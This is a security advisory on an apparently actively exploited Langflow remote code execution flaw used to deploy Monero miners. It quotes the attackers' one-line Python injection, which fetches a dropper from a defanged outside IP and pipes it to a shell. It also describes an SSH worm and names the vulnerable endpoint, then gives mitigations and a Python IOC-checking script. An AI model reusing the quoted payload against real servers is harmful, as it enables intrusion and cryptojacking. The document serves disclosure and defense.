CVE-2026-33017 — Langflow RCE Exploited for Monero Mining on AI Servers
AI relevance: Langflow is a widely deployed low-code orchestration platform for LLM pipelines — CVE-2026-33017 gives attackers unauthenticated remote code execution, and exploitation is already deploying cryptominers on AI infrastructure within 20 hours of disclosure.
The vulnerability
- CVE-2026-33017 (CVSS 9.3) affects all Langflow versions prior to 1.9.0. The flaw resides in the `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint, which accepts an attacker-controlled `code` field and evaluates it as Python directly within the server's process context.
- No authentication is required. Langflow ships with `AUTO_LOGIN` enabled by default, granting any unauthenticated visitor a superuser token and the ability to create a public flow on demand.
- Trend Micro's TrendAI Research documented active exploitation within 20 hours of public disclosure, with attackers deploying Monero cryptominers on internet-exposed AI servers.
- The injection is a single line: `__import__('os').system('curl hxxp://83[.]142.209[.]214:8080/isp.sh | sh')` — this fetches a bash dropper that creates persistence at `/var/tmp/.xlamb/` and launches `lambsys.elf`, a UPX-packed Go binary.
- The dropper functions as an SSH-key-reuse worm, enumerating `~/.ssh/known_hosts` and agent sockets to propagate laterally to every SSH-reachable host via SCP push, even those with no outbound internet access.
- The core payload kills 39 rival cryptominer processes (Kinsing, WatchDog, Outlaw variants) and terminates any processes bound to 13 common mining pool ports — classic territory elimination.
- The 2026 build is 48% smaller than its earliest known variant (May 2024), with VirusTotal detection dropping from 31/66 to 4/66, reflecting deliberate evasion engineering.
- This is the second time in under a year that Langflow has shipped this class of bug — CVE-2025-3248 was exploited by the Flodrix DDoS botnet in June 2025 using an identical primitive.
Why it matters
Langflow is not just another web app — it's the orchestration layer for LLM pipelines, storing API keys, agent configs, tool definitions, and vector database credentials. A successful exploit gives attackers control over the entire AI supply chain for that instance, plus the cloud credentials needed to pivot into broader infrastructure. The SSH worm behavior means a single compromised Langflow server can infect an entire cluster, including air-gapped machines reachable only via SSH.
What to do
- Upgrade immediately: Patch to Langflow 1.9.0 or later. Disable `AUTO_LOGIN` in all deployments.
- Network segmentation: Langflow instances should not have direct SSH access to production clusters. Block egress to known mining pool ports and C&C infrastructure.
- Monitor for IOCs: Check for `/var/tmp/.xlamb/`, `lambsys.elf` processes, and outbound connections to `83[.]142.209[.]214:8080`.
- Audit API keys: Rotate all LLM provider credentials (OpenAI, Anthropic, etc.) stored in Langflow if exposure is suspected.
- SSH key rotation: Revoke and rotate SSH keys on any host that had connectivity to a compromised Langflow server.
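
One way to run the "Monitor for IOCs" check on a Linux host, as an added example that is not from Trend Micro or the Langflow project. The `triage` and `parse_proc_net_tcp` names and the `root` parameter (for scanning a mounted disk image instead of the live system) are assumptions of this sketch; it covers IPv4 only and assumes a little-endian host.

```python
import os
import socket
import struct

# IOCs exactly as listed on this page; the IP stays defanged in source.
IOC_DIR = "var/tmp/.xlamb"
IOC_PROC = b"lambsys.elf"
IOC_C2 = ("83[.]142.209[.]214".replace("[.]", "."), 8080)

def parse_proc_net_tcp(text):
    """Yield (remote_ip, remote_port) for each row of /proc/net/tcp content."""
    for line in text.splitlines()[1:]:          # first line is the column header
        fields = line.split()
        if len(fields) < 3:
            continue
        hex_ip, hex_port = fields[2].split(":")  # rem_address column
        # The kernel prints the address as a host-order 32-bit hex word.
        ip = socket.inet_ntoa(struct.pack("<I", int(hex_ip, 16)))
        yield ip, int(hex_port, 16)

def triage(root="/"):
    """Return a list of (kind, detail) findings for the three IOCs."""
    findings = []
    if os.path.isdir(os.path.join(root, IOC_DIR)):
        findings.append(("path", "/" + IOC_DIR))
    proc = os.path.join(root, "proc")
    pids = sorted(p for p in os.listdir(proc) if p.isdigit()) if os.path.isdir(proc) else []
    for pid in pids:
        try:
            with open(os.path.join(proc, pid, "cmdline"), "rb") as fh:
                argv = fh.read().split(b"\0")
        except OSError:
            continue                             # process exited or is unreadable
        if any(IOC_PROC in arg for arg in argv):
            findings.append(("process", pid))
    try:
        with open(os.path.join(proc, "net", "tcp")) as fh:
            conns = list(parse_proc_net_tcp(fh.read()))
    except OSError:
        conns = []
    if IOC_C2 in conns:
        findings.append(("connection", "%s:%d" % IOC_C2))
    return findings

if __name__ == "__main__":
    for kind, detail in triage():
        print(kind, detail)
```

An empty result only means these three indicators are absent at the moment of the scan; it does not cover short-lived connections or IPv6 sockets in `/proc/net/tcp6`.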